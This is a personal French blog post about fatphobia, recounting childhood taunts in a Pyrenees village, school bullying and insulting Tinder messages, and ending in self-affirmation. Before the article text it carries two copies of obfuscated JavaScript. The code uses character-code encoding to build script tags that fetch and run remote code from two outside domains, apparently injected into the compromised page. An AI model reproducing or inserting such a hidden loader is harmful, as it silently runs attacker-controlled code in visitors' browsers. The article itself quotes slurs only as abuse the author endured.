Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Je suis grosse et je vous emmerde

Alors que la parole sur la grossophobie se libère, j’ai décidé d’apporter ma pierre à l’édifice et de parler de mon expérience personnelle. En tant que grosse. Retour sur des situations parfois consternantes mais souvent comiques (a posteriori).

Attention les yeux, ça va faire mal.

« Regarde, c’est toi ! »

Je suis grosse et je vous emmerde
Moi à 9 ans

Pour ceux qui ne le savent pas (vous tous qui me lisez, en fait), Cieutat est un petit village des Hautes-Pyrénées, composé d’environ 500 habitants. C’est un des endroits où j’ai subi le plus de discrimination. On peut presque dire que cet article leur est dédié (big-up à vous, les enfoirés !).

J’y ai une maison de famille et on y passe tous les étés.

Un soir, je devais avoir 9 ans, on dîne chez un couple d’amis de mes parents. Leur fils avait 16 ans environ (on l’appellera Sergio). Il me montre une photo détournée d’une pub Charal où on peut y voir une femme très obèse, avec le slogan d’époque de la marque « Hmm… Charal ».

Sergio l’a pointée du doigt et m’a dit « regarde, c’est toi ! ».

« C’est pas parce que tu fais 100 kilos que je vais avoir peur de toi » ; « Valérie Damidot ! » ; « Elle est tellement grosse qu’on dirait un mec » ; « Quand tu marches, ton ventre il fait des clins d’oeil ! »

Ceux qui me connaissent bien le savent, je ne me laisse pas faire. Mais ceux qui me connaissent encore mieux savent que quand j’étais petite, j’étais une crème. Si si, je vous jure. Mais quand on vit ce que j’ai vécu (sortez les mouchoirs), on se forge une carapace.

J’ai adoré mes années collège-lycée, j’avais mes amis, ma soeur, les profs m’adoraient – vous n’avez pas remarqué ce petit côté fayote ? Mais putain ce que ça a été dur. Merci pour les séances de psy non remboursées, les mecs !

Je me souviens d’une fois, en Seconde, un mec n’arrêtait pas de m’emmerder. Il s’est mis à m’insulter sur mon poids. Il m’appelait Valérie. J’ai mis du temps à comprendre qu’il voulait parler de Valérie Damidot (d’ailleurs si vous lisez ça, je suis vraiment désolée). Je l’ai pris par le col et je l’ai plaqué sur une table en lui enjoignant de la fermer sinon j’allais lui casser la gueule. Il n’a jamais recommencé.

« Je touche pas les grosses moi, je veux pas me salir »

Quelques années plus tard, je me suis inscrite sur Tinder. Inutile den rappeler le principe. J’ai pu y rencontrer des personnes vraiment sympas et civilisées. Et puis… j’en ai rencontré d’autres. Ces photos devraient suffire d’explication. (Oui, ce sont de vrais screens)

Discussions Tinder

« Je suis moi et je vous emmerde »

Ce serait mentir de dire que j’ai dû traverser ça toute seule. Beaucoup de gens m’ont soutenue, défendue… Des personnes qui étaient ou qui sont devenues des amis.

Alors ouais, je suis grosse. Mais ce nest certainement pas à vous ou à quiconque de me dire ce que je dois être.

Je suis moi et je vous emmerde.

Avec tout mon amour